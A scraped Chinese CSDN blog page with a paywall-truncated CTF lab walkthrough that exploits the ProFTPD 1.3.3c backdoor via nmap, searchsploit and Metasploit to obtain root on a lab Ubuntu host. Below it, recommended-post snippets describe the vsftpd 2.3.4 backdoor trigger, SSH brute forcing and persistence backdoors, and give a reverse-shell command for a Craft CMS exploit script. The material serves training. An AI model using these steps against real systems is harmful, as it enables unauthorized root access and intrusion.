FTP服务后门利用

利用ProFTPD服务漏洞获取root权限
最新推荐文章于 2024-06-30 22:12:06 发布
最新推荐文章于 2024-06-30 22:12:06 发布
阅读量1.6k 收藏 6
点赞数 1
CC 4.0 BY-SA版权
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vhkjhwbs/article/details/102228555
本文详细描述了一次针对开启FTP服务的Ubuntu系统的安全渗透过程。通过信息收集发现靶机运行ProFTPD 1.3.3c版本,存在可利用的溢出漏洞。利用searchsploit获取漏洞代码,并借助metasploit框架成功实现远程后门,最终以root权限获取系统flag。同时介绍了FTP协议的基本概念和searchsploit工具的作用。

靶场: ubuntu 192.168.142.128

攻击机: kali  192.168.11.165

信息收集:

探测服务信息:

nmap -sV 192.168.142.128

可以看到靶机开启了 21 ftp服务,版本号为 ProFTPD 1.3.3c

使用 searchsploit 查看漏洞信息,找到可以利用的溢出代码

可以看到有两个可以用的漏洞,

第一个是 远程后门 ,后面有漏洞利用的代码,

第二个漏洞利用 集成到了 metasploit 中 ,可以利用 metasploit进行更简单的操作

打开 metasploit framwork: msfconsole

搜索可以使用的模块:

我们选用 第4 个模块

use exploit/unix/ftp/proftpd_133c_backdoor

接着设置payload,

先看看有哪些可以使用的payload:<

最低0.47元/天 解锁文章

新学期VIP享超值加赠
FTP服务后门
qq_44813849的博客
06-08 1111
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。 通过扫描靶机IP为:192.168.174.131 攻击机IP为:192.168.174.128 扫描主机服务信息以及服务版本 可以使用searchsploit来查看对应的版本该服务有没有可利用的漏洞 发现了两个利用漏洞,并...
CTF训练笔记(四)- FTP服务后门利用
morrino的博客
04-19 3199
对于开放了FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码; 对于系统一定要注意利用现成的EXP来拿到靶机root权限。 如果靶机开启了多个服务,貌似有很多不同方法可以拿到root权限,那就用最简单的方法。 本次渗透测试利用了已经存在的EXP直接一步到位地拿到了靶机的root权限,极大地提升了获取flag的速度。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
FTP后门漏洞复现(含有漏洞的vsftpd2.3.4)
顾蒅' Home
09-12 7517
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
ftp服务后门利用
Vinson的博客
09-24 797
FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 searchsploit +版本 查看漏洞信息,找到可利用的溢出代码 需要修改这个文件造成溢出 使用Metasploit进行溢出(用msfconsole打开) 1、输入search对应软件和版本号 2、use exploit 3、查看可以使...
对靶机FTP服务后门进行漏洞利用拿到SHELL
zhouA0221的博客
06-30 620
我们使用Nmap的-sV参数来扫描目标主机21端口的服务版本,我们可以看到目标主机的vsftpd是2.3.4版本,而这个版本呢有个后门漏洞,下一步我们就是利用后门,拿到目标主机的SHELL权限。使用exploit利用漏洞进行后门入侵,我们看到从*编程+,就证明已经拿到对方的SHELL了。我们会发现这并不是一个交互式的SHELL,下面将用Python生成一个交互式的SHELL。我们使用二层工具arp-scan通过扫描获得网络中存活主机的IP地址,我们可以看到这里有一个172.30.1.131的主机。
CTF训练 FTP服务后门利用(含靶场下载地址)
ZY_Jack的博客
12-25 1287
FTP服务后门利用扫描端口及漏洞msf扫描和漏洞利用 扫描端口及漏洞 攻击机ip:192.168.88.129 靶机ip: 192.168.88.130 nmap -sV 扫描端口 searchsploit ProFTPD 1.3.3c 这节主要介绍ftp端口。使用searchsploit来查看该版本的ftp服务有没有可利用的漏洞。 searchsploit ProFTPD 1.3.3c msfconsole打开metasploit msf扫描和漏洞利用 search ProFTPd-1.3
CTF-FTP后门利用
墨鱼菜鸡
09-10 381
环境 kali 192.168.20.128 靶机 192.168.20.130 链接:https://pan.baidu.com/s/1ymhZ7ZpEHFnorrkguaYMTA 提取码:xb6o 信息探测 发现漏洞 searchsploit cat /usr/share/exploitdb/exploits/linux/r...
CTF--8.FTP服务后门利用
woo233的博客
09-13 1025
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
FTP信息后门利用
weixin_67986174的博客
05-06 346
查看本机IP地址 利用netdiscover命令扫描靶机ip netdiscover -r [扫描的网段]/网络位 通过nmap工具扫描靶机开放的端口 使用searchsploit来查看对应的版本该服务有没有可利用的漏洞 使用Metasploit进行溢出(用msfconsole打开), 使用search 版本号搜索是否有对应的漏洞命令模块 查看payloads 设置相关参数 设置攻击机ip,靶机ip 显示信息 set rhost 靶机ip set rport 靶机...
ftp服务后门
rlenew的博客
05-28 607
主机:192.168.136.133 靶机:192.168.136.128 用nmap扫靶机 先对21端口入手,用msf查看该版本漏洞 这里利用exploit/unix/ftp/proftpd_133c_backdoor版本后门漏洞渗透,设置参数然后run 直接入侵,查看权限。
渗透测试---FTP服务后门
tzyyyyyy的博客
11-03 954
利用FTP服务后门漏洞 通过使用Metasploit框架进行渗透测试 并且取得root最高权限
Rootkit 后门利用
m0_46239567的博客
05-14 1270
1.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描 渗透测试,并将该操作显示结果中 SSH 服务版本信息字符串作为 FLAG 提交; 2.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行 SSH 暴力破解,将破 解 成 功 的 密 码 作 为 FLAG 提 交 ; ( 用 户 名 : root, 字 典 文 件 /usr/share/wordlists/dirb/small.txt) 使用......
CTF FTP服务后门利用
Kstheme的博客
08-19 935
工具: 靶机 kali linux 操作步骤: FTP介绍 FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:“下载”...
FTP服务后门实战
Fly_鹏程万里
12-15 920
ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限。
4-1CTF夺旗入门教程--FTP服务后门利用
高冷的宅先生
03-28 591
1.信息探测 #开放服务信息 nmap -sV 192.168.2.113 #挖掘全部信息 nmpa -A -v -T4 192.168.2.113 2.查找对应漏洞 #对应FTP版本为ProFTPD 1.3.3c #查找对应漏洞 searchsploit ProFTPD 1.3.3c 3.使用metasploit进行溢出 msfconsole #输入search对应的软件及版本号 >s...
后渗透之各种维持权限的后门原理即利用
p_utao的博客
09-13 4090
前言 在拿到最高权限后,我们就应该建立后门backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
ftp漏洞利用工具
最新发布
03-21
### FTP漏洞利用工具与方法 FTP协议由于其设计上的缺陷,在传输过程中通常采用明文形式进行数据交换,这使得它容易受到中间人攻击以及密码嗅探等问题的影响[^1]。为了应对这些问题并验证系统的安全性,研究人员开发了许多针对FTP服务的漏洞利用工具。 #### 常见的FTP漏洞及其利用方式 1. **VSFTPD v2.3.4 Backdoor Exploit** 对于Metasploitable 2这样的虚拟环境,其中预置了一个带有后门功能的VSFTPD版本v2.3.4。此版本存在一个硬编码的后门账户`backdoor`,通过登录该账户可以获取远程shell访问权限。这种类型的漏洞可以通过手动分析或者借助自动化框架如Metasploit来完成利用过程[^2]。 利用步骤如下: - 启动 `msfconsole` - 加载相应的exploit模块:`use exploit/unix/ftp/vsftpd_234_backdoor` - 配置必要的参数(例如目标地址) ```bash set RHOST <target_ip> ``` - 执行exploit命令以获得session会话 2. **Craft CMS CVE-2024-56145 漏洞利用脚本** 如果目标系统运行的是Craft CMS,并且未及时更新补丁,则可能遭受基于此CMS平台特定逻辑错误所引发的安全威胁。此类场景下,可通过专门编写的Python脚本来实施攻击行为,其中包括设置反向Shell连接等功能特性[^3]。 使用说明: ```python python exploit.py exploit \ -u https://example.com \ -lh 192.168.1.10 \ -lp 4444 \ -fh 127.0.0.1 \ -fp 2121 \ -px bash ``` 3. **通用型Metasploit Framework应用** Metasploit作为一个强大的渗透测试框架,提供了丰富的插件支持各种已知软件产品的安全弱点检测与修复建议指导工作流程管理等方面的服务。当面对未知但可能存在风险的目标机器时,可以从数据库中查找匹配项进而尝试突破防护措施达到控制目的[^4]。 主要操作包括但不限于以下几个方面: - 寻找合适的exploit模块; - 定义具体的工作参数比如远端主机名/IP地址等基本信息; - 发起实际进攻行动直至成功建立交互式终端界面为止。 --- ### 注意事项 尽管上述技术手段能够帮助信息安全从业者更好地理解和解决潜在隐患,但在未经授权的情况下擅自对他人的计算机资源发起任何形式的技术挑战均属违法行为,请务必遵循当地法律法规开展合法合规的研究活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值